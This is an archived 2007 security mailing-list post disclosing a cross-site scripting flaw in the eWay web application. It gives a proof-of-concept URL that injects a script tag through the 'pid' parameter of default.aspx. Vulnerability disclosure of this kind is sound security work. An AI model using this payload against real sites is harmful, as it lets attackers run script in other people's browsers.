OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
XSS in eWay

bl4ckbsdmail.org
Date: Fri Feb 09 2007 - 15:24:36 CST


hey guys .. check out this new xss i just found ;P

Vulnerable : eWay
web : http://www.eway.no/eway

XSS :

http://127.0.0.1/path/default.aspx?pid="><script>alert('bl4ck')</script>

Discovered By BLacK ZeRo
bL4ckbsdmail.org

Best regards ,,